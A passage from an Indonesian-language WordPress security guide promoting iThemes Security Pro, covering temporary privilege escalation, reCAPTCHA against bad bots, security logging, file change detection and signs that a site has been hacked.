Setiap kali Anda membuat pengguna baru, Anda menambahkan titik masuk lain yang dapat dieksploitasi oleh peretas. Tetapi kemungkinan akan ada saat-saat Anda mungkin memerlukan bantuan dari luar untuk situs web Anda, seperti ketika Anda mencari dukungan atau setelah menyewa kontraktor independen. Anda memerlukan cara yang aman dan terjamin untuk menambahkan akses admin sementara ke situs web Anda.

Misalnya, Anda mengalami beberapa masalah dengan salah satu plugin yang terpasang di situs web Anda. Setelah menghubungi dukungan, mereka meminta akses admin ke situs web Anda sehingga mereka dapat melihat lebih dekat. Itu sepertinya permintaan yang sangat masuk akal dan Anda memutuskan untuk memberi mereka akses.

Jadi bagaimana kami memberi seseorang akses administrator sementara ke situs web WordPress kami?

Memberikan Akses Luar ke Situs Web Anda: Dua Opsi

Biasanya, Anda memiliki dua opsi untuk menyediakan akses eksternal ke situs web Anda…. dan tidak ada yang hebat .

1. Bagikan Kredensial Pengguna Anda

Opsi pertama dan terburuk Anda adalah membagikan nama pengguna dan kata sandi pengguna admin WordPress Anda.

Mengapa Membagikan Kredensial Admin Anda Itu Mengerikan

• Keamanan yang Dikurangi – Jika Anda membagikan kredensial pengguna Anda, Anda harus menonaktifkan otentikasi dua faktor untuk mengizinkan orang yang menggunakan kredensial Anda untuk masuk. Google membagikan di blognya bahwa menggunakan otentikasi dua faktor, atau verifikasi 2 langkah, dapat menghentikan 100% serangan bot otomatis. Menonaktifkan otentikasi dua faktor, bahkan untuk waktu yang singkat, secara drastis mengurangi keamanan situs web Anda.
• Tidak nyaman – Berbagi kredensial Anda mengharuskan Anda mengubah kata sandi. Jika Anda lupa mengganti kata sandi Anda, ada satu atau lebih orang yang memiliki akses admin ke situs web Anda kapan pun mereka mau.

2. Buat Pengguna Baru untuk Teknisi Dukungan

Meskipun membuat pengguna admin baru untuk spesialis dukungan lebih baik daripada membagikan kredensial admin Anda, itu tetap tidak bagus.

Mengapa Membuat Pengguna untuk Teknologi Dukungan Itu Mengerikan

• Peningkatan Kerentanan – Membuat pengguna administrator baru menambahkan titik masuk lain yang dapat dieksploitasi. Jika Anda tidak memiliki kebijakan kata sandi, teknisi dukungan dapat memilih kata sandi yang lemah, membuat login WordPress Anda lebih rentan terhadap serangan.
• Tidak Nyaman – Melakukan proses pengaturan pengguna baru kapan pun Anda membutuhkan bantuan dari luar memakan waktu. Anda harus membuat pengguna baru dan kemudian ingat untuk menghapus pengguna ketika mereka tidak lagi membutuhkan akses ke situs web Anda. Ini adalah praktik terbaik keamanan WordPress untuk menghapus pengguna yang tidak digunakan dari situs web Anda.

Apa itu Eskalasi Privilege?

Fitur iThemes Security Pro Privilege Escalation memungkinkan Anda untuk memberikan kemampuan tambahan kepada pengguna untuk sementara.

Eskalasi Hak Istimewa memudahkan dan aman untuk membuat pengguna universal yang dapat Anda berikan kepada pengembang luar atau teknisi pendukung yang memerlukan akses sementara ke situs web Anda.

Dengan Eskalasi Hak Istimewa, Anda dapat membuat pengguna baru dan memberi nama Dukungan dan memberinya peran pengguna Pelanggan. Lain kali Anda perlu memberikan akses sementara ke situs web Anda, Anda dapat mengubah pengguna Dukungan dari pelanggan menjadi administrator. Kami akan membahas cara melakukannya nanti di posting, tetapi pertama-tama, mari kita bicara tentang mengapa Eskalasi Hak Istimewa adalah cara yang lebih baik untuk memberikan akses ke situs web Anda.

Mengapa Eskalasi Hak Istimewa Lebih Baik

• Mudah – Anda tidak perlu membuat pengguna baru setiap kali Anda perlu memberikan akses ke situs web Anda.
• Otomatis – Peningkatan hak istimewa hanya berlangsung selama 24 jam. Setelah 24 jam habis, pengguna secara otomatis kehilangan semua hak istimewa tambahan. Anda tidak harus ingat untuk menghapus pengguna atau mengubah kata sandi apa pun.
• Tanpa Pengorbanan dalam Keamanan – Anda masih dapat meminta pengguna dukungan universal ini untuk menggunakan metode email dua faktor untuk masuk, yang berarti Anda memiliki tingkat keamanan yang sama seperti yang Anda lakukan dengan pengguna admin lainnya. Karena peran pengguna yang sebenarnya adalah pelanggan, Anda tidak memiliki risiko nyata untuk meninggalkannya di situs web Anda.

Cara Menggunakan Eskalasi Privilege di iThemes Security Pro

Untuk memulai, aktifkan Privilege Escalation di halaman utama pengaturan keamanan.

Anda dapat membuat pengguna baru dan beri nama Dukungan dan berikan peran pengguna Pelanggan. Lain kali Anda perlu memberikan akses sementara ke situs web Anda, navigasikan ke halaman Profil pengguna Dukungan Anda.

Perbarui alamat email untuk mengizinkan orang dukungan luar meminta kata sandi baru. Kemudian gulir ke bawah hingga Anda melihat pengaturan Eskalasi Hak Istimewa Sementara. Klik sakelar Tetapkan Peran Sementara , dan pilih Admin. Pengguna sekarang akan memiliki akses Admin selama 24 jam ke depan.

Jika mereka tidak membutuhkan 24 jam penuh, Anda dapat mencabut eskalasi hak istimewa dari halaman profil pengguna. Jika Anda membutuhkan lebih dari 24 jam, Anda dapat mengatur jumlah hari yang tepat yang Anda butuhkan di bidang Hari .

Membungkus

Popularitas WordPress menjadikannya target para peretas di seluruh dunia. Seperti yang telah kita bahas, penyerang dapat menyebabkan kerusakan dengan meretas bahkan pengguna WordPress tingkat terendah.

Berita baiknya adalah meskipun tidak ada cara untuk mencegah serangan terhadap pengguna WordPress Anda, dengan sedikit usaha dari pihak kami, kami dapat mencegah serangan agar tidak berhasil.

Bagian 8: Lindungi Situs Web Anda Dari Bot Buruk

Di bagian panduan keamanan WordPress ini, Anda akan belajar, apa itu bot dan bagaimana memblokir bot jahat agar tidak membuat kekacauan di situs web Anda.

Apa itu Bot?

Bot adalah perangkat lunak yang diprogram untuk melakukan daftar tugas tertentu. Pengembang membuat serangkaian instruksi yang akan diikuti bot secara otomatis tanpa perlu memberi tahu pengembang untuk memulai. Bot akan melakukan tugas yang berulang dan biasa lebih cepat dari yang kita bisa.

Berbagai bot terus merayapi situs web Anda. Beberapa bot ini bagus dan memberi Anda layanan yang berharga. Bot lain memiliki motif yang lebih jahat. Mari luangkan waktu sejenak untuk berbicara tentang apa itu bot dan berbagai jenis bot.

Bot yang Baik

Memantau bot – iThemes Sync Pro Uptime Monitoring menggunakan bot untuk memantau waktu aktif situs web Anda. Bot memeriksa situs web Anda setiap 5 menit untuk memverifikasi bahwa itu masih online. Jika situs web Anda tidak aktif, bot akan mengirimkan peringatan sehingga Anda dapat membuat situs Anda kembali online.

Bot audit – Audit Situs iThemes Sync Pro menggunakan bot Google Lighthouse untuk memeriksa kualitas halaman web Anda. Contoh bagus lainnya dari bot audit adalah pemeriksa tautan rusak yang akan merayapi situs web Anda mencari tautan yang mengirim Anda ke lokasi yang tidak ada.

Bot Pengumpan – Contoh yang sangat baik dari bot pengumpan adalah pemutar podcast Anda. Pemutar podcast Anda menggunakan bot untuk memantau umpan RSS dari podcast yang Anda berlangganan dan memberi tahu Anda saat podcast favorit Anda merilis episode baru.

Search Engine Bots – Perayap web Google adalah contoh bot mesin pencari. Jenis bot ini akan merayapi situs web Anda mencari halaman baru atau yang dimodifikasi dan membuat indeks situs web Anda. Setelah Google atau mesin pencari lain memiliki indeks situs web Anda, mereka akan dapat membagikan halaman Anda dengan orang-orang yang menggunakan mesin pencari mereka.

Bot Keamanan – Pemindaian Situs Pro Keamanan iThemes menggunakan bot untuk membandingkan daftar plugin dan tema yang Anda pasang dengan basis data kerentanan kami. Jika Anda memiliki plugin atau tema yang diinstal dengan kerentanan yang diketahui, bot akan secara otomatis menerapkan tambalan jika tersedia.

Bot yang Buruk

Content Scraping Bots – Bot ini diprogram untuk mengunduh konten situs web Anda tanpa izin Anda. Bot dapat menduplikasi konten untuk digunakan di situs web penyerang guna meningkatkan SEO mereka dan mencuri lalu lintas situs Anda.

Spambot – Spambot menyebalkan. Mereka akan mengotori komentar Anda dengan janji menjadi jutawan saat bekerja dari rumah dengan harapan mengirim pengunjung Anda ke situs web jahat.

Brute Force Bots – Bot Brute Force menjelajahi internet mencari login WordPress untuk diserang. Setelah bot ini mendarat di halaman login, mereka akan mencoba bentuk paling sederhana untuk mendapatkan akses ke sebuah situs: dengan mencoba menebak nama pengguna dan kata sandi, berulang kali, hingga berhasil.

Cara Memblokir Bot Buruk Tanpa Memblokir Bot Baik: reCAPTCHA V3

Google reCAPTCHA membantu menjaga bot jahat agar tidak terlibat dalam aktivitas kasar di situs web Anda seperti mencoba membobol situs web Anda menggunakan sandi yang disusupi, mengeposkan spam, atau bahkan mengorek konten Anda.

Namun, pengguna yang sah akan dapat masuk, melakukan pembelian, melihat halaman, atau membuat akun. reCAPTCHA menggunakan teknik analisis risiko tingkat lanjut untuk membedakan manusia dan bot.

Fitur Google reCAPTCHA di iThemes Security Pro melindungi situs Anda dari bot jahat. Bot ini mencoba masuk ke situs web Anda menggunakan kata sandi yang disusupi, memposting spam, atau bahkan mengorek konten Anda. reCAPTCHA menggunakan teknik analisis risiko tingkat lanjut untuk membedakan manusia dan bot.

Apa yang hebat tentang reCAPTCHA versi 3 adalah membantu Anda mendeteksi lalu lintas bot yang menyalahgunakan di situs web Anda tanpa interaksi pengguna apa pun. Alih-alih menampilkan tantangan CAPTCHA, reCAPTCHA v3 memantau berbagai permintaan yang dibuat di situs Anda dan mengembalikan skor untuk setiap permintaan. Skor berkisar dari 0,01 hingga 1. Semakin tinggi skor yang dikembalikan oleh reCAPTCHA, semakin yakin bahwa manusia membuat permintaan. Semakin rendah skor yang dikembalikan oleh reCAPTCHA, semakin yakin bot yang membuat permintaan.

iThemes Security Pro memungkinkan Anda untuk menetapkan ambang batas blok menggunakan skor reCAPTCHA. Google merekomendasikan menggunakan 0,5 sebagai default Anda. Ingatlah bahwa Anda dapat secara tidak sengaja mengunci pengguna yang sah jika Anda menetapkan ambang terlalu tinggi.

Anda dapat mengaktifkan reCAPTCHA pada pendaftaran pengguna WordPress, reset kata sandi, login, dan komentar. iThemes Security Pro memungkinkan Anda menjalankan skrip Google reCAPTCHA di semua halaman untuk meningkatkan akurasi skor bot vs. manusianya.

Membungkus

Ada bot yang baik dan bot yang buruk. reCAPTCHA memblokir bot jahat dari situs web Anda tanpa menghalangi bot baik yang memberikan nilai.

Bagian 9: Log Keamanan WordPress

Logging adalah bagian penting dari strategi keamanan WordPress Anda. Pencatatan dan pemantauan yang tidak memadai dapat menyebabkan keterlambatan dalam mendeteksi pelanggaran keamanan. Sebagian besar studi pelanggaran menunjukkan bahwa waktu untuk mendeteksi pelanggaran adalah lebih dari 200 hari! Jumlah waktu itu memungkinkan penyerang untuk menembus sistem lain, memodifikasi, mencuri, atau menghancurkan lebih banyak data. Karena alasan itulah Insufficient Logging masuk dalam 10 besar risiko keamanan aplikasi web OWASP.

Log keamanan WordPress memiliki beberapa manfaat dalam strategi keamanan Anda secara keseluruhan.

1. Identitas dan hentikan perilaku jahat.
2. Temukan aktivitas yang dapat memperingatkan Anda tentang pelanggaran.
3. Menilai berapa banyak kerusakan yang dilakukan.
4. Ajudan dalam perbaikan situs yang diretas.

Jika situs Anda diretas, Anda pasti ingin memiliki informasi terbaik untuk membantu penyelidikan dan pemulihan cepat.

Apa itu Log Keamanan WordPress?

Log Keamanan WordPress di iThemes Security Pro melacak peristiwa keamanan penting yang terjadi di situs web Anda. Peristiwa ini penting untuk dipantau untuk menunjukkan jika atau ketika pelanggaran keamanan terjadi.

Log keamanan situs web Anda adalah bagian penting dari strategi keamanan apa pun. Informasi yang ditemukan dalam catatan ini dapat digunakan untuk mengunci pelaku jahat, menyoroti perubahan yang tidak diinginkan di situs, dan membantu mengidentifikasi dan menambal titik masuk serangan yang berhasil.

Peristiwa Keamanan Dilacak & Dicatat oleh iThemes Security

Berikut ini adalah peristiwa keamanan WordPress yang dilacak oleh plugin iThemes Security Pro.

1. Serangan Brute Force WordPress

Serangan brute force mengacu pada metode coba-coba yang digunakan untuk menemukan nama pengguna dan kata sandi untuk meretas situs web. WordPress tidak melacak aktivitas login pengguna apa pun, jadi tidak ada apa pun yang terpasang di WordPress untuk melindungi Anda dari serangan brute force. Terserah Anda untuk memantau keamanan login Anda untuk melindungi situs WordPress Anda.

Untungnya, serangan brute force tidak terlalu canggih, dan cukup mudah untuk diidentifikasi di log Anda. Anda perlu mencatat nama pengguna dan IP yang mencoba masuk dan apakah proses masuk berhasil. Jika Anda melihat bahwa satu nama pengguna atau IP memiliki upaya login yang gagal berturut-turut, kemungkinan Anda berada di bawah serangan brute force.

Setelah Anda tahu situs web Anda sedang diserang, Anda dapat menghentikannya! Penting untuk diingat bahwa tidak ada cara untuk mencegah serangan terjadi di situs web Anda. Namun, dengan memantau upaya login yang tidak valid, Anda dapat mencegah serangan tersebut agar tidak berhasil.

iThemes Security Pro hebat dalam mengunci orang jahat. Namun, jika orang jahat menggunakan nama pengguna Bob dalam serangan brute force, dan Bob adalah pengguna sebenarnya di situs tersebut, sayangnya Bob akan dikunci bersama penyerang.

Meskipun rasanya menyenangkan untuk menghentikan orang jahat agar tidak membobol situs, kami tidak suka jika keamanan memengaruhi pengalaman pengguna yang sebenarnya. Kami membuat Tautan Ajaib untuk memungkinkan pengguna yang sah melewati penguncian nama pengguna, sementara penyerang brute force tetap terkunci.

2. Pemindaian Malware

Anda tidak hanya harus menjalankan pemindaian malware, tetapi Anda juga harus merekam hasil setiap pemindaian malware di log keamanan WordPress Anda. Beberapa log keamanan hanya akan merekam hasil pemindaian yang menemukan malware, tetapi itu tidak cukup. Sangat penting untuk diberi tahu secepat mungkin tentang pelanggaran ke situs web Anda. Semakin lama Anda mengetahui tentang peretasan, semakin banyak kerusakan yang akan terjadi.

Meskipun senang melihat sejarah pendekatan proaktif terhadap keamanan membuahkan hasil, itu hanyalah bonus dan bukan alasan untuk merekam setiap pemindaian malware.

Jika Anda tidak mendokumentasikan pemindaian terjadwal, Anda tidak akan tahu apakah ada kegagalan pemindaian. Tidak merekam pemindaian yang gagal dapat membuat Anda berpikir bahwa situs Anda sedang diperiksa setiap hari untuk mencari malware, tetapi, pada kenyataannya, pemindaian gagal diselesaikan.

Baca posting sorotan fitur Pemindaian Situs untuk mempelajari bagaimana iThemes Security Pro dapat melindungi Anda dari penyebab nomor satu peretasan WordPress.

3. Aktivitas Pengguna

Menyimpan catatan aktivitas pengguna di log keamanan WordPress Anda dapat menjadi penyelamat Anda setelah serangan berhasil.

Jika Anda memantau aktivitas pengguna yang benar, itu dapat memandu Anda melalui garis waktu peretasan dan menunjukkan semua yang diubah oleh peretas, mulai dari menambahkan pengguna baru hingga menambahkan iklan farmasi yang tidak diinginkan di situs Anda.

iThemes Security Pro memantau 5 jenis aktivitas pengguna:

1. Masuk / Keluar

Jenis aktivitas pengguna pertama yang dicatat adalah ketika pengguna masuk dan keluar dari situs web Anda dan dari mana. Memantau waktu dan lokasi login pengguna dapat membantu Anda menemukan pengguna yang disusupi. Apakah pengguna itu masuk pada waktu yang tidak biasa atau dari tempat baru? Jika demikian, Anda mungkin ingin memulai penyelidikan Anda dengan mereka.

2. Pembuatan / Pendaftaran Pengguna

Aktivitas selanjutnya yang harus Anda catat adalah pembuatan pengguna, terutama pembuatan pengguna Administrator. Jika seorang peretas dapat mengkompromikan pengguna yang sah, mereka dapat membuat pengguna admin di sana sendiri dalam upaya untuk menjadi rahasia. Mudah bagi Anda untuk melihat sesuatu yang aneh dengan akun Anda, tetapi jauh lebih sulit untuk mengidentifikasi aktivitas jahat pada pengguna lain.

Pemantauan pendaftaran pengguna juga penting. Beberapa kerentanan memungkinkan peretas untuk mengubah peran pengguna baru default dari Pelanggan menjadi Administrator.

Jika Anda mengatur Pencatatan Pengguna hanya untuk memantau aktivitas pengguna Administrator, hanya pendaftaran pengguna Admin baru yang akan dicatat dalam log keamanan. Jadi, jika Anda pernah melihat pengguna yang baru terdaftar di log keamanan Anda, ada yang tidak beres.

3. Menambah dan Menghapus Plugin

Sangat penting untuk membuat catatan tentang siapa yang menambahkan dan menghapus plugin. Setelah situs Anda diretas, penyerang akan mudah menambahkan plugin khusus mereka untuk menyuntikkan kode berbahaya ke situs web.

Bahkan jika seorang peretas tidak memiliki akses ke server atau basis data Anda, mereka mungkin masih dapat membuat perubahan dari dasbor WordPress Anda. Dengan menggunakan plugin, mereka dapat menambahkan pengalihan ke situs Anda untuk digunakan dalam kampanye konversi spam berikutnya, atau menyuntikkan malware ke database Anda. Setelah kode berbahaya mereka dieksekusi, mereka kemudian dapat menghapus plugin untuk menghapus bukti kejahatan mereka. Beruntung bagi kami, kami tidak akan melewatkannya karena semuanya didokumentasikan dalam log keamanan WordPress kami.

4. Beralih Tema

Aktivitas pengguna lain yang dipantau oleh iThemes Security Pro User Logging adalah ketika seseorang mengganti tema situs web. Jika Anda pernah menemukan bahwa tema Anda tiba-tiba berubah, Anda dapat melihat di log keamanan WordPress Anda untuk mengetahui siapa yang membuat perubahan.

5. Perubahan pada Postingan & Halaman

Terakhir, Anda ingin memantau setiap perubahan pada posting dan halaman Anda. Apakah ada tautan yang ditambahkan untuk mengirim lalu lintas Anda ke situs lain? Memantau posting dan halaman dapat membantu Anda menemukan halaman memalukan atau tautan berbahaya yang ditambahkan ke situs web Anda setelah pelanggaran.

Untuk mengetahui kiriman mana yang diubah, klik tautan Lihat Detail untuk menemukan ID kiriman.

Lihat pos sorotan fitur Pencatatan Pengguna untuk mempelajari lebih lanjut tentang bagaimana memantau aktivitas pengguna dapat membantu Anda kembali dari peretasan.

Membungkus

Pencatatan yang tidak memadai adalah salah satu dari 10 risiko keamanan aplikasi web teratas OWASP. Memantau perilaku yang tepat akan membantu Anda mengidentifikasi dan menghentikan serangan, mendeteksi pelanggaran, serta mengakses dan memperbaiki kerusakan yang terjadi pada situs web Anda setelah serangan berhasil.

Bagian 10: Saat Bencana Keamanan WordPress Menyerang

Bahkan jika Anda mengikuti praktik terbaik keamanan WordPress, masih ada kemungkinan situs Anda disusupi. Kompromi berarti peretas melanggar situs web Anda dan menginfeksinya dengan malware.

Apa itu Pelanggaran Keamanan?

Pelanggaran keamanan adalah ketika penjahat dunia maya dapat memperoleh akses tidak sah ke situs web atau server Anda. Pelanggaran keamanan dapat terjadi dalam banyak cara berbeda, karena peretas mengeksploitasi beberapa masalah keamanan WordPress yang paling umum. Dari menjalankan versi plugin dan tema yang sudah ketinggalan zaman hingga injeksi SQL yang lebih rumit, pelanggaran keamanan dapat terjadi bahkan pada pemilik situs yang paling waspada sekalipun.

Saatnya Mendeteksi Pelanggaran Keamanan: Faktor Kunci dalam Membersihkan Situs Web yang Terinfeksi

Tahukah Anda bahwa rata-rata waktu yang diperlukan untuk menemukan pelanggaran situs web adalah 200 hari? Sayangnya, semakin lama Anda menyadari adanya pelanggaran, semakin banyak kerusakan yang dapat dilakukan peretas terhadap situs web Anda, pelanggan Anda, dan Anda. Sepotong malware dapat menyebabkan jumlah kerusakan yang mengejutkan dalam 200 hari. Itulah mengapa sangat penting untuk mengurangi waktu yang diperlukan untuk menemukan pelanggaran keamanan.

Mengapa? Pembersihan dan waktu henti yang Anda perlukan untuk membersihkan situs web Anda setelah kerusakan selama 200 hari juga mengejutkan. Waktu untuk menyelidiki semua yang disentuh malware dan data pelanggan mana yang dicuri hanya meningkat sementara pelanggaran tetap tidak terdeteksi. Belum lagi waktu yang harus Anda habiskan untuk memberi tahu pelanggan bahwa mereka perlu membatalkan kartu kredit mereka karena peretas mencatat semua penekanan tombol mereka saat mengunjungi situs web Anda.

Biaya untuk diretas sangat besar. Anda harus membayar seseorang untuk menyelidiki pelanggaran dan membersihkan situs web Anda. Spesialis perbaikan peretasan harus menghapus situs web Anda saat mereka bekerja, dan orang-orang tidak akan dapat melakukan pembelian baru saat situs web Anda tidak aktif. Setelah kehilangan kepercayaan pelanggan Anda, kemungkinan besar Anda akan kehilangan pembelian di masa mendatang yang akan mereka berikan kepada Anda.

Biaya peretasan adalah mengapa sangat penting untuk melihat pelanggaran sesegera mungkin. Semakin cepat Anda menemukan pelanggaran, semakin cepat Anda dapat menghentikan kerusakan lebih lanjut yang terjadi, dan semakin cepat Anda bisa membuat situs web dan bisnis Anda kembali online.

Apakah Pemindai Malware Cukup?

Pemindai malware menyediakan cara untuk memindai situs WordPress Anda dari file dan skrip berbahaya yang diketahui. Tetapi apakah pemindai malware cukup untuk mendeteksi pelanggaran keamanan?

Dalam satu kata, tidak. Jangan berpikir bahwa Anda hanya dapat mengandalkan pemindai malware untuk memeriksa apakah situs web Anda terinfeksi. Tidak ada pemindai malware yang dapat mengidentifikasi setiap bagian dari malware yang ada. Jika Anda menemukan pemindai malware yang mengklaim 100% akurat, Anda harus menjalankannya karena pemindaian yang membuat klaim seperti ini seringkali paling tidak akurat di luar sana.

Tanda Tangan vs. Deteksi Malware Perilaku

Mayoritas pemindaian malware dan perangkat lunak antivirus menggunakan tanda tangan malware untuk mendeteksi malware. Pemindaian malware yang lebih canggih akan menggunakan kombinasi deteksi tanda tangan dan analisis perilaku.

Tanda Tangan Malware

Tanda tangan malware adalah serangkaian byte yang digunakan untuk mengidentifikasi bagian malware yang diketahui. Beberapa pemindai malware didukung oleh database yang berisi tanda tangan malware dari jutaan virus yang dikenal.

Pemindaian malware berbasis tanda tangan cepat, sederhana, dan akan mendeteksi 100% malware yang dikenal dan dipahami dengan baik. Semua itu hebat dan akan menangkap malware yang ditambahkan oleh peretas tingkat rendah.

Namun, peretas yang terampil tahu bahwa pemindai malware memeriksa tanda tangan malware yang dikenal. Peretas ini memiliki kemampuan untuk mengaburkan tanda tangan malware agar tetap tidak terdeteksi oleh pemindai biasa Anda.

Malware baru dirilis pada tingkat yang pemindai malware tidak dapat memperbarui database mereka dengan semua tanda tangan terbaru. Jadi pemindai berbasis tanda tangan tidak akan dapat membedakan antara sedikit malware baru dan file readme.txt plugin.

Analisis Perilaku

Analisis perilaku memeriksa tindakan perangkat lunak untuk menentukan apakah itu berbahaya. Ada banyak sekali jenis perilaku yang dapat dianggap mencurigakan atau berbahaya. Misalnya, iThemes Security Pro Site Scan memanfaatkan Google Safe Browsing API untuk membantu menjaga situs web tetap aman. Penjelajahan Aman Google akan memeriksa untuk melihat apakah perangkat lunak mengalihkan lalu lintas ke situs berbahaya yang diketahui.

Sekali lagi, tidak ada metode deteksi malware yang sangat mudah. Tetapi kombinasi pemeriksaan perilaku dan tanda tangan akan secara signifikan meningkatkan peluang Anda untuk diberi tahu tentang bukti pelanggaran keamanan.

Perilaku Apa yang Dibagikan oleh Semua Malware?

Kami tahu betapa pentingnya mendeteksi pelanggaran keamanan sesegera mungkin, dan hanya mengandalkan deteksi malware saja tidak cukup. Jadi kami bertanya-tanya bagaimana iThemes Security Pro dapat mengurangi waktu yang dibutuhkan orang untuk mendeteksi pelanggaran keamanan di situs web mereka?

Meskipun jenis kerusakan yang disebabkan malware di situs web Anda sangat bervariasi, apa yang dilakukannya dapat diringkas menjadi satu atau kombinasi dari tiga hal berikut.

1. Tambahkan File – Malware dalam bentuk spyware dapat menambahkan file berbahaya yang akan merekam penekanan tombol pelanggan Anda saat mereka memasukkan informasi kartu kredit mereka.
2. Hapus File – Beberapa malware akan menghapus file yang sah dan menggantinya dengan file berbahaya dengan nama yang sama.
3. Ubah File – Malware akan mencoba menyembunyikan kode berbahayanya dengan menyembunyikannya di file yang sudah ada yang dimodifikasi.

Bukankah lebih baik jika diberi tahu tentang perubahan tak terduga pada situs web Anda sehingga Anda dapat memeriksanya untuk mencari tanda-tanda pelanggaran keamanan?

Cara Mengurangi Waktu yang Diperlukan untuk Mendeteksi Pelanggaran Keamanan

Kunci untuk menemukan pelanggaran keamanan dengan cepat adalah memantau perubahan file di situs web Anda.

Fitur Deteksi Perubahan File di iThemes Security Pro akan memindai file situs web Anda dan memberi tahu Anda saat terjadi perubahan di situs web Anda.

Ada beberapa alasan sah Anda melihat aktivitas perubahan file baru di log Anda, tetapi jika perubahan yang dibuat tidak terduga, Anda harus meluangkan waktu untuk memastikan perubahan itu tidak berbahaya. Misalnya, jika Anda melihat perubahan yang dibuat pada plugin pada tanggal dan waktu yang sama saat Anda memperbarui plugin, tidak ada alasan untuk menyelidikinya.

Cara Mengaktifkan Deteksi Perubahan File di iThemes Security Pro

Untuk mulai memantau perubahan file, aktifkan Deteksi Perubahan File di halaman utama pengaturan keamanan.

Setelah Deteksi Perubahan File diaktifkan, iThemes Security Pro akan mulai memindai semua file situs web Anda dalam potongan-potongan . Memindai file Anda dalam potongan akan membantu mengurangi sumber daya yang diperlukan untuk memantau perubahan file.

Pemindaian perubahan file awal akan membuat indeks file situs web Anda dan hash filenya. File hash adalah versi singkat dari konten file yang tidak dapat dibaca manusia.

Setelah pemindaian awal selesai, iThemes Security Pro akan terus memindai file Anda dalam potongan-potongan. Jika hash file berubah pada salah satu pemindaian berikutnya, itu berarti konten file telah berubah.

Anda juga dapat menjalankan perubahan file manual dengan mengklik tombol Pindai File Sekarang di pengaturan Deteksi Perubahan File

Mengaktifkan Email Pemberitahuan Perubahan File

Perubahan file terjadi setiap saat, dan mendapatkan peringatan email untuk setiap perubahan akan dengan cepat menjadi luar biasa. Dan sebelum Anda menyadarinya, itu menjadi anak laki-laki yang menangis situasi serigala, dan Anda mulai mengabaikan peringatan perubahan file sama sekali.

Mari kita lihat bagaimana iThemes Security Pro secara cerdas mengidentifikasi perubahan yang sah untuk mengurangi notifikasi dan bagaimana Anda dapat menonaktifkan notifikasi untuk file yang diharapkan sering diperbarui.

Anda dapat mengelola semua pemberitahuan Keamanan iThemes Anda dari Pusat Pemberitahuan di dalam plugin Keamanan iThemes. Dari dasbor admin WordPress Anda, kunjungi Keamanan> Pengaturan dan temukan modul Pusat Pemberitahuan .

Bagaimana iThemes Security Pro Mengidentifikasi Perubahan File yang Sah

Ada beberapa cara agar iThemes Security Pro dapat mendeteksi jika perubahan yang dilakukan pada file adalah sah dan tidak perlu dikhawatirkan. iThemes Security Pro tidak akan membuat pemberitahuan Perubahan File untuk perubahan yang dapat diverifikasi.

1. Pembaruan Plugin/Tema Diselesaikan Oleh Manajemen Versi

Fitur Manajemen Versi di iThemes Security Pro memungkinkan Anda memperbarui WordPress, plugin, dan tema secara otomatis.

Jika pembaruan diselesaikan oleh Manajemen Versi, iThemes Security Pro akan mengetahui sumber pembaruan dan tidak akan memicu peringatan.

2. Perbandingan File untuk Plugin & Tema iThemes

Centang kotak Bandingkan File Online di pengaturan Deteksi Perubahan File untuk mengaktifkan perbandingan file online.

Setiap kali file di situs web Anda milik plugin atau tema iThemes diubah, itu akan dibandingkan dengan file di server iThemes. Jika hash ke versi file di situs web Anda cocok dengan hash ke versi di server iThemes, itu akan menjadi perubahan yang sah, dan Anda tidak akan menerima peringatan.

3. Perbandingan File Online WordPress.org

Jika file inti WordPress atau plugin yang diinstal dari repositori WordPress.org diubah, file tersebut akan dibandingkan dengan versi di WordPress.org. Jika hash cocok, perubahan tersebut tidak berbahaya, dan Anda tidak akan menerima peringatan.

4. Pengecualian Manual

Anda dapat mengecualikan file, direktori, dan jenis file dari Deteksi Perubahan File dalam pengaturan Deteksi Perubahan File.

Aturan umumnya adalah boleh saja mengecualikan file yang Anda tahu akan diperbarui secara berkala. File cadangan dan cache adalah contoh sempurna untuk ini. Mengecualikan jenis file ini akan menenangkan banyak kebisingan ekstra.

7 Tanda Situs WordPress Anda Diretas

Menemukan diri Anda bertanya, “ Apakah situs WordPress saya diretas? ” berarti Anda menginginkan jawaban cepat.

Semakin cepat Anda melihat tanda-tanda pelanggaran situs web, semakin cepat Anda bisa membersihkan situs Anda. Semakin cepat Anda dapat membersihkan situs web Anda, semakin sedikit kerusakan yang dapat dilakukan peretasan pada situs web Anda.

1. Beranda Anda Berbeda

Perubahan pada beranda Anda tampak seperti tanda yang jelas. Tetapi berapa kali Anda benar-benar menjalankan pemeriksaan menyeluruh atau beranda Anda? Saya tahu saya biasanya langsung menuju URL login saya dan bukan URL rumah saya. Dari sana, saya masuk, memperbarui situs saya atau mengedit posting. Setelah saya menyelesaikan apa yang harus saya lakukan, saya sering pergi tanpa melihat halaman beranda situs web saya.

Tujuan utama dari beberapa peretasan adalah untuk menjebak situs web atau mendapatkan ketenaran. Jadi mereka hanya mengubah beranda Anda menjadi sesuatu yang mereka anggap lucu atau membiarkannya diretas dengan kartu panggil.

Jika Anda melihat perubahan pada beranda Anda, Anda dapat memulihkan situs web Anda dengan cepat dan mudah menggunakan file cadangan yang dibuat dengan plugin cadangan WordPress tepercaya seperti BackupBuddy.

2. Performa Situs Web Anda Turun

Situs Anda mungkin terasa lamban saat terinfeksi. Anda dapat mengalami pelambatan di situs web Anda jika Anda mengalami serangan brute force atau jika ada skrip berbahaya yang menggunakan sumber daya server Anda untuk penambangan cryptocurrency. Demikian pula, DDoS (atau serangan penolakan layanan ) terjadi ketika jaringan IP secara bersamaan mengirimkan permintaan ke situs web Anda dalam upaya untuk menyebabkannya mogok.

3. Situs Web Anda Berisi Iklan Popup Berbahaya atau Spam

Ada kemungkinan besar peretas telah menyusup ke situs web Anda jika pengunjung Anda melihat munculan yang mengarahkan mereka ke situs web jahat. Tujuan dari jenis serangan ini adalah untuk mengarahkan lalu lintas dari situs Anda ke situs penyerang sehingga mereka dapat menargetkan pengguna dengan penipuan klik untuk iklan Pay Per Click.

Hal yang paling membuat frustrasi tentang jenis peretasan ini adalah Anda mungkin tidak dapat melihat munculan. Peretasan popup dapat dirancang untuk tidak ditampilkan kepada pengguna yang masuk, yang mengurangi kemungkinan pemilik situs web melihatnya. Jadi meskipun pemilik situs logout, popup tidak akan pernah ditampilkan.

Tampilan popup Anda juga dapat dibatasi jika Anda menggunakan ekstensi pemblokir iklan di browser Anda. Misalnya, pelanggan melaporkan peretasan sembulan dan membagikan tangkapan layar serta video sembulan. Setelah saya menghabiskan berjam-jam menelusuri situs web mereka, saya tidak dapat membuat ulang apa pun yang mereka laporkan. Saya yakin bahwa komputer pribadi mereka telah diretas dan bukan situs webnya.

